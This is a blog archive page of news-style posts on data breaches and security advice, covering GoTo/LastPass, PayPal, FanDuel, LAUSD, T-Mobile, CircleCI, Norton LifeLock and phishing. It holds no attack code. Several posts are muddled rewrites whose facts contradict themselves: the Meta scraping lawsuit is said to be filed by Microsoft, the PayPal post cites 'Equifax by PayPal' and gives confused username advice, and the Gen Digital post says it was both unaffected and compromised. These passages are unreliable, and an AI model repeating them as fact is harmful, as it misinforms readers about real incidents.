Search This Blog

Showing posts with label Data Breach. Show all posts

Source Code & Private Data Stolen From GoTo

GoTo, the parent company of LastPass, has disclosed that hackers recently broke into its systems and seized encrypted backups belonging to users. It claimed that in addition to LastPass user data, hackers managed to obtain data from its other enterprise products.

A data breach including the theft of source code and confidential technical information was announced by GoTo affiliate LastPass in August of last year. GoTo acknowledged being impacted by the attack in November, which was connected to an unidentified third-party cloud security vendor.

Paddy Srinivasan, chief executive of GoTo, revealed that the security breach was more severe than initially suspected and involved the loss of account usernames, salted and hashed passwords, a piece of the Multi-Factor Authentication (MFA) settings, along with some product settings and license data.

Despite the delay, GoTo did not offer any restoration assistance or guidance for the impacted consumers. According to GoTo, the company does not keep track of its client's credit card or bank information or compile personal data like dates of birth, addresses, or Social Security numbers. Contrast that with the incident that affected its subsidiary, LastPass, in which hackers grabbed the contents of users' encrypted password vaults along with their names, email addresses, phone numbers, and payment information.

LastPass' response to the leak was ripped apart by cybersecurity experts, who charged the firm with being opaque about the gravity of the situation and failing to stop the hack. To provide more reliable authentication and login-based security solutions, GoTo is also transferring its accounts onto an improved Identity Management Platform.

The number of impacted consumers was not disclosed by GoTo. Jen Mathews, director of public relations at GoTo, claimed that the company has 800,000 clients, including businesses, but she declined to address other queries.

Ahead of Data Privacy Day, Here are Best Password Practices to Safeguard Yourself

 

This week is Data Privacy Day, a day dedicated to raising awareness about how to protect your data and information online. The risks associated with the collection, processing, and storage of personal data are increasing, both on an individual and corporate level. 

Even today, most people are unsure how to respond when their rights are violated as a result of a data breach or leak. Keeper Security is sharing password best practices in order to keep accounts and data safe from threat actors. The goal is to educate consumers and businesses about privacy and to assist them in protecting themselves from the growing threat of data breaches.

Even when so-called passwordless options such as biometrics are used, the security of an individual's identity, data, and online accounts is heavily reliant on the strength of their passwords. Individuals must understand the difference between weak and strong passwords, especially since a breach could affect the organization for which they work, causing millions of dollars in damages. Data shows that stolen or weak passwords are responsible for 81% of hacking-related data breaches.

"Data Privacy Day provides an opportunity to elevate the critical importance of cybersecurity in all of our lives. The digital transformation shows no signs of slowing down, and with ever more connected devices from smartphones to smart fridges, we must all take concrete steps to protect ourselves," said Darren Guccione, CEO, and Co-founder at Keeper Security. 

He further added, "it is imperative everyone utilize strong and unique passwords for all of their accounts and store those passwords in a secure, encrypted vault to reduce their risk of an attack. The existential reality is that anyone can become a victim of cybercrime."

Think before you share, open, or click

One critical step to online safety is to avoid sharing personal information with anyone unless absolutely necessary. Keep an eye out for links in emails from suspicious or unknown senders, and learn how to spot phishing attempts. Download attachments only when you are certain they are safe.

Because it is human nature to believe what we see, aesthetics and user interface frequently trick users into clicking on a malicious, incorrect URL. The important thing is to make sure the URL matches the authentic website. When a password manager is used, it detects when the URL of a site does not match what is in the user's vault. This is an essential tool for preventing the most common types of attacks, such as phishing scams.

Improve your password habits by doing the following:
  • Do not use any easy-to-guess character combinations.
  • Prevent using the same password for multiple accounts and incorporating any personal information.
  • Keystroke patterns and short passwords should also be avoided.
  • As a password, avoid using repeated letters or numbers.
  • Use long combinations of letters, symbols, and numbers instead.
  • Creating a memorable phrase called a passphrase by randomly replacing certain letters with numbers or symbols.
  • Creating mnemonic passwords, for example, based on significant events.
Implementing a secure password manager is the best way for online users to secure their passwords. Individuals can use an effective password manager to generate random character combinations for their passwords and save them in a password vault. Users will no longer need to write them down or remember them, which makes them more vulnerable to breaches.

A password manager with zero trust and zero knowledge creates an even more secure environment for users to store their passwords. Even in the worst-case scenario of a breach, the stored data is encrypted in cypher text, which means it cannot be accessed or read by a human or machine.

PayPal Users Should Check Their Accounts

 


It seems that scammers never cease trying to con people. Keeping customers' information private and secure is of the utmost importance to companies, so they use many ways to protect against a breach in their network. 

Despite these digital blockades, hackers have tried to figure out ways to get around them. As the world learns more about the use of technology, the methods criminals employ to commit theft are also improving. 

Until a few years ago, banks and credit card companies were plagued by much more serious issues related to ID theft than they are today. 

There is the potential for a data breach to occur at any time. Banks and credit card companies must comply with higher standards of data security than companies in the private sector.  

Only a company can take all the necessary steps to safeguard the data of its customers and employees. Login and password restrictions are one of the most annoying things customers face when using their services. The most effective way to ensure the safety of your personal information is not to use your login username as your e-mail address if you are concerned about the security of your personal information. 

As a result, they are even more vulnerable to possible hacking attempts. To keep your password secure, you should never reuse it. The company provides you with a login portal. In this portal, you are told that you cannot use the same password you used in the past. This is intended to protect you and not to annoy you. However, when it says you cannot use a password, it can be quite frustrating. 

This message will appear if you use the same password for the company's portal more than once. This puts you at risk for hackers as you place yourself at risk by reusing passwords. Despite the inconvenience of having a unique login and password, it is better to do so than to face the consequences of identity theft or other financial scams. 

The PayPal System Has Not Been Hacked

There is no need for you to panic, even though you may feel that the headlines are leading you to believe PayPal has been hacked. The company's network has not been compromised. To pull off the scam, credentials were stuffed, which is the kind of fraud perpetrated. Hackers use many combinations of logins to find the true ones, and with password-guessing techniques, they discover the original logins. In other words, it is a kind of onslaught attack against the network, but it does not break the system that protects the company's information and assets. A scammer finds the usernames for other companies that may or may not be as secure as the company in which they are located. This is done for the sake of cross-checking the usernames. 

A company that cleans houses and allows customers to have some login username and password will not have the same kind of data protection as PayPal (PYPL), which was designed to have robust protection for its users and data. There is a much higher chance of hackers being able to break into a less secure company data network. This is because the same login username is used by PayPal and the cleaning companies' customer portals. 

In this way, the hacker will be able to get access to passwords. Hackers use the data they collect to break into broader, safer networks, having access to this kind of data provides them with more opportunities to break into other websites and hack their data. 

It is only one hurdle scammers need to overcome if they wish to gain access to a unique username and password for the site. Having two-factor authentication does not necessarily mean that crooks cannot get through, but at least they will be slowed down. There were about 35,000 PayPal accounts that were hacked by these scammers in December by acquiring authentic usernames for these accounts. 

PayPal Can Assist in Repairing Breached Accounts  

As a result of this latest credential-stuffing attack, PayPal has contacted 34,942 customers whose accounts have been compromised. As part of this presentation, they learned how to better protect themselves and their accounts against cyberattacks in the present as well as in the future. Sometime between the 6th of December and the 8th of December last month, PayPal's customer accounts were compromised by an attacker. There was no notice of the breach until mid-December. 

It is also imperative for customers to use unique usernames and passwords for all of their online accounts to help protect themselves and their accounts. While having original passwords and usernames is a time-consuming and sometimes inconvenient process, it is also one of the easiest and most cost-effective ways to protect individuals' digital identity and their personal information in the digital world. As reported by CNET, Equifax by PayPal company has also offered two years of free identity theft monitoring to affected accounts. 

After a Vendor Hack, FanDuels Warns of a Data Breach

 


A security breach has been detected at FanDuel's sportsbook and betting site, which exposed customers' names, email addresses, and payment information. This occurred in January 2023, when MailChimp's security was breached. A security advisory urges users to be wary of phishing emails and stay vigilant against them. 

An employee's credentials were stolen by hackers using a social engineering attack on MailChimp's website on January 13th, according to an announcement from the company. 

To steal the "audience data" of 133 users, the threat actors used these credentials to log in to an internal MailChimp tool and access customer support and administration information. 

It is imperative to note that MailChimp customers receive different audience data. However, generally, it contains the names and email addresses of customers, or potential customers, who receive marketing emails about the products and services they are interested in. 

During the MailChimp breach, FanDuel sent an email to its customers last Thursday informing them that they were the victims of a cyberattack by threat actors. 

According to an email received by FanDuel from an outside technology vendor that sends transactional emails on behalf of its clients, such as FanDuel, the vendor had recently experienced a security breach that affected several of its clients due to a security breach within their system, reads a report published by FanDuel titled 'Notice of Third-Party Vendor Security Incident.' 

FanDuel's vendor confirmed on Sunday evening that unauthorized individuals gained access to the names and email addresses of customers registered on FanDuel's site. No passwords for individual accounts or financial information were leaked in this incident. 

According to FanDuel, the breach was not a breach of their servers or the personal information of FanDuel users, and the hackers did not acquire any "passwords, financial account information, or other sensitive information" as a result of the breach. 

Even though the notification to BleepingComputer did not specify which third-party vendor had been breached, FanDuel has confirmed that MailChimp was the source of the breach to BleepingComputer. 

As a result of the recent data breach by FanDuel, the company is encouraging its customers to "remain vigilant" against phishing attacks and attempts to take over their accounts. 

A FanDuel security incident email warns, "Be aware that emails that claim to be from FanDuel may pose a problem with your account that requires you to provide unique or personal information to resolve it." People should remain vigilant against email "phishing" attempts. 

There is no way for FanDuel to send direct emails to customers and ask for personal information to resolve a dispute. 

As well as warning customers about the importance of updating their passwords frequently, FanDuel also wants customers to know that they should enable multi-factor authentication (MFA) on their accounts and avoid clicking on links within password reset attempts that don't originate from them. 

The stolen MailChimp data has not yet been used in an attack. There are no indications that it will be used in such an attack. However, in the past, malicious actors have abused this type of stolen data in phishing attacks. 

There was a security breach of MailChimp in April 2022, which led to threat actors stealing marketing email data for the Trezor smart wallet, a hardware wallet.  

To steal cryptocurrency wallets, these data were then used in a phishing campaign. In this campaign, malicious software was instructed to push malicious software to be shown on the browser by claiming to be fake data breach notifications. 

Furthermore, FanDuel accounts are increasingly becoming a target of credential stuffing attacks, with threat actors actively targeting the account of customers through this method [1,2,3]. 

A cybercrime marketplace can sell these accounts for as little as $2 or as much as $7. This depends on the account's balance or the payment information it has been linked to. 

It would be more difficult to steal an account if you enabled multi-factor authentication with an authentication app on your FanDuel account. Even though an identity hacker may get access to the credentials of a customer, this is still the case. 

In many cases of account compromises, the login credentials for other sites are used in the compromise of one's account and then the data of the user is stolen. Once these credentials have been obtained, a threat actor uses them to log into other websites and attempt to access their accounts. 

For this reason, you should use a password manager to store all your passwords. You should also create a unique password for every site where you log in. This will ensure that a breach on one website does not affect you on another.

LAUSD Computers are Breached via Cybercriminals

According to Los Angeles Unified School District (LAUSD), the second-largest school district in the U. S., the Vice Society ransomware group has stolen files containing private information, including Social Security Numbers, from contractors (SSNs).

Additionally, LAUSD disclosed that the threat actors were present on its network for more than two months, from July 31 to September 3, 2022. The group claimed to have stolen 500 GB of data from the school system's systems to BleepingComputer before distributing the stolen material, but they offered no supporting documentation.

Experian's IdentityWorksSM, which aids in detecting information misuse, is being made available to contractors and their staff members by LAUSD for free for a year. The FBI, CISA, and MS-ISAC jointly released an advisory warning of Vice Society's excessive targeting of the U.S. education sector on the day LAUSD reported the ransomware attack. Hackers replied to L.A. Unified's refusal to pay a ransom by exposing the data they obtained into the dark web, where other nefarious characters may use it for identity theft.

The school district declared it would not comply with the cybercriminals' ransom demands in order to better utilize the money for its students and their education, the ransomware group released data from LAUSD.

Data theft is simply one aspect of an operation. The second step entails encrypting computer systems so that users are unable to access them and daily business is rendered impossible. Although basic tasks, such as classroom instruction and record-keeping, were more challenging for approximately two weeks, hackers were able to encrypt systems in the district's facilities division. Schools never had to temporarily close, as in other places when various school systems were targeted.

The revelation in the notice came as no surprise to cybersecurity professionals. They anticipated that an examination would show the system intrusion started earlier than was initially reported. Officials from the school district did not disclose the number of potential victims. When there are more than 500 California citizens affected, the required number for public notification, a notice letter should be filed with the state attorney general in addition to notifying the victims.

Cyber Thieves Target Retirement Accounts


Data security has become a priority for tax returns, credit cards, and other conventional targets of cyber criminals. Online thieves have recently been targeting employer retirement plans and the accounts in the plans. 

Data security at retirement plans varies, and there are numerous ways to breach it. Cybercriminals seek to exploit each plan's weakest link. 

In one of the instances, a retiree at a large employer recently discovered that his monthly pension cheque was not deposited on time. He got in touch with the retirement administrator, who, after some investigations discovered that the specified bank account for the contribution had been altered. 

The retired person did not alter the account. Instead, the request was made by an unidentified party. An employee of planning processed the change request since it was relevant and accurate. 

Fortunately, neither the retiree nor the plan lost financially. The payments were abruptly terminated, and the retirement account was changed from a payment method to a depository. After a brief investigation, the plan administrator found that change requests had been made for several other retirees, all of which were being paid to the same bank account. 

By monitoring his accounts carefully and noting that his monthly payment was not deposited on the usual day of the month, this retiree was able to avoid becoming a victim of cybercrime. He further got in touch with the administrator right away to make sure the modification did not happen. 

Methods Used by Hackers 

There are several methods used by threat actors in order to steal from retirement plans and accounts. 

  • One of the tactics used is the conventional method of accessing an email system. Cybercriminals may as well use “phishing” emails in order to deceive an employee or retiree into exposing access information.

Phishing attacks generally include threat actors sending an email to the target key employee or retiree and posing as a legitimate corporate employee (often a high-level executive) or a third-party vendor. 

The fraudulent email asks for specific information and, in the case of several employees or retirees, may request a list of personal information. Sensitive information can be given to criminals via email if the recipient is not watchful. 

  • Another method used by cybercriminals is purchasing personal details about the retirement account owners via the dark web and utilizing the data in order to access the retirement account. 

Whatever the method be, if cyber thieves get access to the data, they can utilize it to log into the account of a retiree or employee and reroute payments or disbursements. 

How to Protect Yourself 

  • One way to secure your data is to make yourself aware of the security measures of retirement planning. In particular, how to verify the validity of each request for an account change. What does it do to verify the identity of the user? Is two-factor authentication used before an account can be accessed or changed online?
Of course, none of the data security precautions are effective if online criminals make modification requests on paper. Thus, after confirming the accuracy of the information on the paper request, the user may inquire as to whether the plan administrator takes any further actions. 
  • Setting up your own personal cyber security procedures is another strategy to safeguard oneself. According to security professionals, most of the user's personal data is available for sale on the dark web. This makes it important to keep the information as secure as possible. 

This could be made possible by following precautions such as not sharing their Social Security number and other important information unless it is necessary. 
  • Keep a check on your accounts on a regular basis. If the deposit is due on a certain day, make sure deposits have been made by checking your accounts around that time each month. The plan administrator should be contacted if the deposit is not made. 
  • Moreover, log in to your account in order to monitor any suspicious activity. You may as well look for any unauthorized changes and transactions. Lastly, make sure that your address, beneficiary, and other details have not been changed.  

37 Million Accounts' Data were Stolen from T-Mobile in a Data Breach Involving APIs

 

T-Mobile, a wireless provider in the United States, reported earlier this week that an unidentified malicious intruder broke into its network in late November and stole information on 37 million customers, including addresses, phone numbers, and dates of birth. 

The breach was found Jan. 5, according to T-Mobile, which disclosed this in a filing with the U.S. Securities and Exchange Commission. According to the company's investigation to date, the stolen data didn't include passwords or PINs, bank account or credit card information, Social Security numbers, or other official identifications. 

The malicious activity "appears to be fully contained at this time, but our investigation is still ongoing," T-Mobile said, adding that the data was first accessed on or around Nov. 25.

In recent years, the company has experienced numerous hacks. In its filing, T-Mobile stated that it did not anticipate the most recent breach to materially affect its business.

However, Neil Mack, a senior analyst at Moody's Investors Service, stated in a statement that the breach raises concerns about management's cyber governance, may alienate customers, and may draw the attention of the Federal Communications Commission and other regulators. 

The frequency of these cybersecurity incidents at T-Mobile is alarmingly high compared to that of its telecom competitors, Mack said, even though they may not be systemic in nature. 

T-Mobile announced in August 2021 that personal information including Social Security numbers and driver's licence information had been stolen. As a result, the company agreed to pay $350 million to customers who brought a class action lawsuit. There were almost 80 million affected Americans. 

Additionally, it announced at the time that it would invest $150 million in other technologies and data security through 2023. Prior to the August 2021 intrusion, the company disclosed breaches in which customer information was accessed in January 2021, November 2019 and August 2018. 

After acquiring rival Sprint in 2020, Bellevue, Washington-based T-Mobile rose to prominence as one of the nation's major providers of mobile services. After the merger, it claimed to have more than 102 million clients.

Google Receives Sensitive Data From Abortion Pill Websites

 


Several online pharmacies are selling abortion pills online and sharing their customers' personal information, such as their search history and geolocation, with Google and other third parties. ProPublica has learned that by using this information, one can identify the users of these websites, which could be used to track them down. 

In post-Roe America, where there is no abortion, this type of private information could prove to be downright dangerous when law enforcement subpoenas such sensitive information to prosecute women who wish to end their pregnancies, even though data privacy advocates may be concerned about it. It could prove even more dangerous for women who wish to end their pregnancies in this country. 

It is not uncommon for police to not even have to use the courts if they wish to compel businesses to hand over this data. This is because executives often hand it over willingly and without a court order. 

In the aftermath of the Supreme Court's ruling in Dobbs, which overturned Roe v. Wade and ended the right to abortion, there have been more than a dozen states in the country that are now prohibiting surgical and medical abortions - aka abortion pills - across their borders. 

ProPublica analyzed the pharmacies' websites through The Markup's website privacy inspector to find out which types of trackers they are using and why they are using them. There was a report that found a minimum of nine websites selling abortion medication also collected and shared records regarding their customers. This includes other websites they visited, search terms entered, general location, and general device information. 

It is essentially the website's actual visitor data that is shared with online tools that enable websites to track visitor numbers and traffic patterns. These tools enable websites to provide live chat support and do other helpful things with the information. 

According to ProPublica's investigation, nine of the sites are sending Google data that could potentially identify users, including random numbers associated with the browser of each user, which then could be matched with other information acquired through the sites, the investigative non-profit documented.  

In total, there are nine pharmacies available for abortion-related services, including Abortion Ease, BestAbortionPill.com, PrivacyPillRX, PillsOnlineRX, Secure Abortion Pills, AbortionRx, Generic Abortion Pills, Abortion Privacy, and Online Abortion Pill Rx. 

The Register contacted several pharmacies about the issue, but no one responded. Companies dealing with abortion pills must stop sharing data with Google and Facebook immediately, said Cooper Quintin, Senior Staff Technologist at the Electronic Frontier Foundation (EFF).  

As web developers may not have thought that they were placing their users at risk when they used Google Analytics and third-party tracking, they now have to consider the risk of putting their users at risk. In the current political climate, all websites, but especially those that serve at-risk users, must consider whether assisting Google, Facebook, and others in building user profiles could lead to an extremely horrific outcome, Quintin told in a report. They can not continue acting as though Roe's decision is still the law of the land. 

It is worth noting that the EFF has not yet witnessed any instances where law enforcement agencies have used this type of information to prosecute abortion seekers or providers. According to Quintin, he is concerned that someday, the data stored on big tech platforms such as Google, Facebook, and even Facebook themselves may be used as a dragnet tool to search for women seeking abortions or other reproductive care services and prosecute them. 

If a court order is served on a tech company, they will typically turn over their users' private information and messages to the police. This is if served with a court order. It has been revealed that Google received more than 87,000 search warrants and subpoenas in 2021. 

'Purely Hypothetical and Technically Impossible,' States Google

Google does not specify whether any of these requests were related to health information in its report. The major search engine company is not afraid to take action against government demands to turn over customer data to the government. This is according to a spokesperson for the company. 

It is also prohibited for Google Analytics customers to upload any information that might give away a person's identity to Google during the process of analyzing their data. Moreover, Google has strongly disputed the conclusions of the non-profit organization. 

According to Google Analytics Product Director Steve Ganem, the allegations described in ProPublica's latest article regarding Google Analytics are purely hypothetical. They are technically impossible in the real world. 

As Ganem noted, "Google Analytics was designed specifically so that we and other third parties, including law enforcement, would be unable to identify users through Google, possibly under some circumstances." As well as that, Google also has strict policies against advertising to people who provide sensitive information on their website. 

Last year, Google promised to update the system used to track where users are located. This will ensure that trips to medical clinics and other sensitive places are automatically excluded.   

Bogus DHL Emails Enable Attackers to Hack Microsoft 365 Accounts

 

As per experts, a new phishing campaign has been discovered that impersonates logistics giant DHL in order to steal Microsoft 365 credentials from victims in the education industry. Cybersecurity researchers from Armorblox recently found a significant phishing campaign, with more than 10,000 emails sent to inboxes connected to a "private education institution". 

The email is designed to appear to be from DHL, with the company branding and tone of voice one would expect from the shipping giant. The recipient is informed in the email titled "DHL Shipping Document/Invoice Receipt" that a customer sent a parcel to the incorrect address and that the correct delivery address must be provided.

False login prompt
The email apparently includes an attachment, labeled "Shipping Document Invoice Receipt," which, when opened, appears to be a blurred-out preview of a Microsoft Excel file.

A Microsoft login page appears over the blurred-out document, attempting to deceive people into believing they must log into their Microsoft 365 accounts in order to view the file's contents. If the victims provide the login credentials, they will be sent directly to the attackers.

Armorblox explained, “The email attack used language as the main attack vector in order to bypass both Microsoft Office 365 and EOP email security controls. These native email security layers are able to block mass spam and phishing campaigns and known malware and bad URLs. However, this targeted email attack bypassed Microsoft email security because it did not include any bad URLs or links and included an HTML file that included a malicious phishing form.”

Businesses can safeguard themselves against phishing attacks by training their employees to recognize red flags in their inboxes, such as the sender's email address, typos and spelling errors, a feeling of urgency (legitimate emails almost never require the user to respond urgently), and unexpected links/attachments.

According to the researchers, the attackers used a valid domain to avoid Microsoft's email(opens in new tab) authentication checks.

Synthetic Identity Fraud: What Is It?

Frankenstein ID, the use of fake identities by scammers, has become prevalent over the last 12 to 18 months, with US financial institutions (FIs) reporting losses of $20 billion in 2021 as compared to $6 billion in 2016.

Synthetic Identity Fraud: What Is It? 

When a Social Security number is stolen, synthetic identity fraud occurs. Hackers then use it in conjunction with bits of accurate personal data obtained from various sources or entirely false information to build an identity in order to commit theft.

Synthetic identity theft is unknown, thus allowing fraudsters to carry out their crimes undetected. Researchers discovered that two out of every three American adults were extremely unaware of fake identity theft.

What is the Frequency of Child Identity Theft and Fraud?

In contrast to adults, stealing the identities of minors gives hackers a wider window to utilize the credentials since the majority of victims who had their identities taken as children do not become aware of the fraud until they are adults. Social media, personal health information, and school forms pose the greatest threats to data theft involving minors, which is a concern for nearly two-thirds of adults. 

SSNs can be found by hackers in different spots, like your email account or the database of your chosen merchant. Even student data is stolen and published on the dark web by ransomware groups. Hackers take SSNs to commit synthetic ID theft. As they are more likely to belong to minors, they favor numbers that were granted within the last 18 years. Children generally wait until they are 18 to apply for loans or credit, giving criminals ten or even fifteen years to cause havoc before anyone takes notice.

A hacker will start seeking credit online if they have a social security number. Users, then, simply build a credit history just by seeking credit. A creditor will eventually grant them a $500 or perhaps $1,000 credit line. A breakout occurs once hackers have access to $10,000 to $15,000 in credit. After a final flurry of charges, the attackers fade. 

86 % of parents do not check their kids' credit, so hackers can ruin it for years. Due to this, synthetic identity has severe repercussions that frequently prevent its young victims from beginning their adult lives. The fact that children lack control over their credit or financial information makes them vulnerable as well.


Gen Digital Customers' Accounts were Breached by Hackers

 


A Norton LifeLock spokesperson has confirmed that malicious third parties are likely to have gained access to some customers' accounts, possibly even gaining access to their password vaults. 

The document describing affected customers' rights as a result of a data breach is available on the website of the Vermont attorney general's office. Using username and password login combinations, the report suggests hackers may have been able to access the accounts of Norton and Norton Password Manager users. 

According to the vendor, which is owned by Gen Digital, the login information was not obtained by breaching the IT environment of the company itself. This is due to a security breach. 

As one of the leading manufacturers of antivirus software for consumers, Gen Digital Inc. is a publicly traded company. It has been more than a year since Gen Digital, a security company founded in September, was formed when Norton LifeLock Inc. and Avast plc merged. In addition to antivirus software, Gen Digital also sells cybersecurity products that include password managers and virtual private networks tools, and some other cybersecurity products.

A report regarding the breach of some Gen Digital accounts emerged on Friday, indicating that some customers' accounts had been compromised. According to a statement released by the company the next day, it had "secured 925,000 inactive and active accounts that may have been targeted" by hackers during the attack. TechCrunch reported earlier this week that the accounts of 6,450 customers had been compromised as a result of the breach. 

In an attempt to break into Gen Digital's customer database, hackers may have accessed the names, telephone numbers, and mailing addresses of a large number of customers. The company discovered, some of the data stored in its Norton Password Manager tool may have been compromised as a result of the breach. Gen Digital says it is possible that one of the hackers was able to access the login credentials of the users that were affected in Norton Password Manager. This is a password management program. 

It has been reported that Gen Digital was not affected by the breach and that no data had been compromised. Hackers allegedly gained access to customer accounts by stuffing credentials to breach the security of the antivirus maker's systems. That is the term used to describe a type of cyberattack. In this attack, hackers compromise customers of another company by using login credentials they have stolen from one of their competitors. 

There has been no compromise of any systems, and they are safe and operational. However, threat actors are all too common in today’s world of taking credentials that they find elsewhere, like on the dark web, and using them to make automated attacks. This enables them to gain access to other unrelated accounts. According to a spokesperson for the company, the system has not been compromised.  

It was Gen Digital that first recognized the breach on December 12 after discovering an unusually high number of failed login attempts that were aimed at its customers' accounts. Earlier this month, the company identified the lack of security measures by which hackers were able to gain access to customer accounts. 

It was Gen Digital who found out about the breach and notified the affected customers and rewrote their passwords as soon as possible. To ensure that customers are protected, the company also says "additional security measures" have been implemented. 

Earlier this month, one of Gen Digital's major competitors in the password manager market, LastPass US LLP, suffered a breach of its security. This breach coincided with the launch of the company. Earlier in August, a cyberattack against the company was preceded by another breach of security. Hackers accessed LastPass' cloud storage environment using the technical information they stole during the August cyberattack in which technical information was stolen. 

During the hacking operation, hackers gained access to the usernames and billing addresses of customers. A backup copy of LastPass' password manager, which is the most widely used password management tool available, was also obtained by hackers. As per the policy of the company, the encrypted copy of account information cannot be decrypted without the password of the user's account, which was not compromised.

How to Safeguard Your Data in the Era of Privacy Violations

 

When our information falls into the wrong hands, it could cause a lot of harm, especially since con artists frequently prey on helpless victims. More evidence that widespread fraud and scams are on the rise comes from the recent data breaches at Optus and Medibank. According to the Attorney-office, General's identity theft, con artists, and credit card fraud cost Australians $900 million annually. However, there are extra precautions we can take to safeguard ourselves. How? Read on.

Invest in a password manager

Don't make it simple for con artists to figure out. The word "password" is one of the most popular passwords, did you know that? one more typical one? 123456. Although they are simple to remember, none of us can expect to remember every password we have. There are fortunately some excellent password manager products available. The best cloud-based password manager, according to Finder.com.au, is LastPass, which is also reasonably priced. 1Password was singled out as a flexible password manager that's particularly useful for iPhone or Mac users. Both are capable of creating passwords and checking accounts for security holes. Additionally, they advise changing insecure passwords and synchronising your passwords between your computer and smartphone.

Multi-factor authentication 

We should all use multi-factor authentication whenever possible, according to the Cyber Security Stakeholder Group (CSSG), a group made up of the ATO, tax practitioner industry groups, governmental organisations, and industry partners. Users must provide multiple pieces of information, such as a text message sent to your phone when logging into a website, as part of multi-factor authentication. Your accounts may become more difficult for others to access by adding this extra layer of security. 

Consider a credit ban 

Think someone has stolen your identity? By obtaining a credit ban, you can prevent scammers from taking out loans in your name. It is a gratis service. IDCare.org, an independent organisation that offers free assistance to people affected by fraud or scams, suggests that you can apply to credit reporting agencies for a credit ban to prevent people from obtaining credit or loans in your name. The 21-day suspension can be extended. When a bank or credit provider verifies your eligibility for credit, they consult credit reporting agencies, and if you have placed a ban on your credit report, the check will be unsuccessful if someone attempts to take out a loan in your name. 

Maintain software updates

The Australian Tax Office reports an increase in the use of malicious software. Accidentally clicking on an email or website link that can infect your computer can be simple.

"Your device might occasionally be affected by ransomware. When you use ransomware, your computer can be locked until you pay a fee to let criminals install software that gives them access to your bank accounts and lets them steal your money," the ATO warned. The response? Install the most recent security updates, perform routine antivirus scans, and use a spam filter on your email accounts to protect yourself. Weekly malware and anti-virus scans should be conducted, and security software should be current. 

Consult your bank 

You may have received correspondence from your bank about enhancing security as a result of the most recent data breaches. For instance, Westpac requires the presentation of forms of identification. So that no one can pretend to be you, request additional checks from your financial institution. 

In order to alert you to any unusual activity on your accounts, The Commonwealth Bank advises customers to activate location-based security, set notification preferences, and review registered devices. Yet another wise move? If you're worried about your accounts right now, you might want to think about lowering your daily withdrawal caps.

Mass Data Scraping Lawsuit Filed by Meta

 


As part of a lawsuit filed against the digital surveillance firm Voyager Labs, Meta claims that the company created 38,000 fake, unauthorized accounts to collect 600,000 Facebook users' personal information. 

A federal lawsuit filed by Microsoft has asked a California court for Voyager to be banned from Facebook and Instagram, claiming that the company scraped the “viewable profile information” of Facebook and Instagram users. They claim the company scraped posts, likes, friend lists, photos, and comments from Facebook and Instagram users. It has been reported that Facebook groups and pages were allegedly tapped for data. 

After the company approached companies interested in monitoring social media without being detected, Voyager sold the company's tool to the highest bidder, according to Gizmodo. 

In addition, Twitter, YouTube, LinkedIn, and Telegram accounts were created to scrape data. So far, Meta, the company that owns Facebook, is the only social media firm that has taken legal action against Voyager. 

The company wrote in a blog post about the legal filing. It said that Voyager had violated Facebook's terms of service regarding fake accounts and automated scraping and automating of user accounts. To hide its activity, Voyager used a network of computers and networks spread across many different countries to scrape user data, Meta further explained. 

A free trial of Voyager's software was used by the Los Angeles Police Department in 2019, according to The Guardian in 2021. 

Following a pitch from the company, they purchased it as a surveillance tool to monitor thousands of online friends of potential suspects.  

It has been reported in the Guardian that LAPD was told that through this tool, officers would be able to "predict" crimes before they occur and communicate with potential victims.  

PCMag's request for comment from Voyager was not immediately answered. The Supreme Court allowed Meta earlier this week to pursue a lawsuit against Israeli spyware company NSO Group, which had gained access to WhatsApp servers "unlawfully" when installing spyware on users' devices through their WhatsApp accounts. 

Last month, Meta accepted a one-year settlement from a class-action lawsuit in which the plaintiffs accused Meta of sharing personal data about their users without their consent, a move that did not end well for Meta. The lawsuit alleges the company shared users' data without their consent with third parties.  

A lawsuit filed by Facebook in 2018 was filed after it was revealed that the company had shared up to 87 million Facebook users' Personal Information with a British consulting firm, Cambridge Analytica.

 CircleCI Breach: Encryption Keys & User Data Seized

A software company CircleCi has acknowledged that a data breach that occurred last month resulted in the theft of customers' personal information. 

After an engineer contracted data-stealing malware that made use of CircleCi's 2FA-backed SSO session cookies to get access to the company's internal systems, hackers broke into the company in December. CircleCi reminded consumers to change their credentials and passwords earlier this month after disclosing a security breach.

The company accepted responsibility for the breach and criticized a system failure, noting that its antivirus program missed the token-stealing malware on the employee's laptop. Using session tokens, users can maintain their login status without constantly typing their password or re-authorizing using two-factor authentication. However, without the account holder's password or two-factor code, an attacker can access the same resources as them by using a stolen session token. As a result, it may be challenging to distinguish between a session token belonging to the account owner and one stolen by a hacker.

According to CircleCi, the theft of the session token enabled the hackers to assume the identity of the employee and obtain access to a few of the business systems, which store client data. CircleCi states they rotated all customer-related tokens, including Project API Tokens, Personal API Tokens, and GitHub OAuth tokens, in retaliation to the hack. Additionally, the business collaborated with Atlassian and AWS to alert clients of potentially hacked AWS and Bitbucket tokens.

CircleCi claims that in order to further fortify its infrastructure, they have increased the number of detections for the actions taken by the information-stealing malware in its antivirus and mobile device management (MDM) programs.

"While client data was encrypted, the cybercriminals also gained the encryption keys able to decrypt consumer data," claimed Rob Zuber, the company's chief technology officer. To avoid illegal access to third-party systems and stores, researchers urge customers who have not already taken steps to do so. The company additionally tightened the security of its 2FA solution and further limited access to its production settings to a smaller group of users.

Norton LifeLock Issues a Warning for Password Manager Account Breach

 

Customers of Norton LifeLock have been the victims of a credential-stuffing attack. In accordance with the company, cyberattackers utilised a third-party list of stolen username and password combinations to attempt to hack into Norton accounts and possibly password managers. 

Gen Digital, the LifeLock brand's owner, is mailing data-breach notifications to customers, mentioning that the activity was detected on December 12 when its IDS systems detected "an unusually high number of failed logins" on Norton accounts. According to the company, after a 10-day investigation, the activity dates back to December 1. 

While Gen Digital did not specify how many accounts were compromised, it did warn customers that the attackers had access to names, phone numbers, and mailing addresses from any Norton account. And it added, "we cannot rule out that the unauthorized third party also obtained details stored [in the Norton Password Manager], especially if your Password Manager key is identical or very similar to your Norton account password." 

Those "details" are, of course, the strong passwords generated for any online services used by the victim, such as corporate logins, online banking, tax filing, messaging apps, e-commerce sites, and so on.

Threat actors utilize a list of logins acquired from another source — such as purchasing cracked account information on the Dark Web — to try against new accounts, hoping that users have repurposed their email addresses and passwords across multiple services. As a result, the irony of the Norton incident is not lost on Roger Grimes, KnowBe4's data-driven defense evangelist.

"If I understand the reported facts, the irony is that the victimized users would have probably been protected if they had used their involved password manager to create strong passwords on their Norton login account. Password managers create strong, perfectly random passwords that are essentially unguessable and uncrackable. The attack here seems to be that users self-created and used weak passwords to protect their Norton logon account that also protected their Norton password manager," he stated via email.

